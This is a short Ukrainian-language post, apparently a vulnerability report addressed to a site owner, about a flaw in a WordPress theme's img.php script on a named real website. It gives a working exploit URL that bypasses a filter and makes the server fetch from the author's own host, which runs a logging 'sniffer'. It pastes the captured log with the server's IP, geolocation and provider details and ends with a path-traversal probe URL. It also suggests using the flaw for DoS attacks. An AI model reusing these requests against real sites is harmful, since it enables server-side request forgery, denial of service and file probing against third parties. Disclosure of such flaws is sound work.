невеличка вразливість в img.php
http://mkukraine.com.ua/wp-content/themes/edmin-1.2.9/themify/img.php?src=http://mobilink.url.ph/img/logo.php?http://mkukraine.com.ua/?435635774568
Тут я обійшов фільтр та підключився до свого сервера (сніфер http://mobilink.url.ph/img/log.php?password=VTrim) через ваш
А взагалі таку штуку можна використати для DoS атак від IP вашого сервера.
Запис N35
IP адрес: 78.137.1.149 (Переглянути інформацію)
Браузер (UserAgent): Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Рядок запиту: http://mkukraine.com.ua/?45777567
Реферер: Немає
Real IP: Немає
Мова:
Тип запиту: GET
Час запиту: 4 хвилини тому
Заголовок Accept: */*
Тип кодування: Немає
Тип підключення: close
Імя віддаленого хоста: Немає
Порт користувача: 59215
Гео IP інформація
Код країни: UA
Регіон: Черкасская область
Населений пункт: Черкасы
Географічні координати: Широта - 49.42854º Довгота - 32.06207º
Поштовий індекс: 18030
Часовий пояс: +03:00
Провайдер IP інформація
ОФ. назва провайдера в бд RIPE: McLaut-Invest LLC
Назва російською: ООО "Маклаут-Инвест"
Сайт провайдера: http://mclaut.com/
Номер автономної системи провайдера: 25133
Числове значення (iptolong) першої IP адреси мережі провайдера: 1317601280
Числове значення (iptolong) останньої IP адреси мережі провайдера: 1317609471
Мережа провайдера: 78.137.0.0
Маска мережі провайдера: 19
Ну тут просто помилки
http://mkukraine.com.ua/wp-content/themes/edmin-1.2.9/themify/img.php?src=../../../../../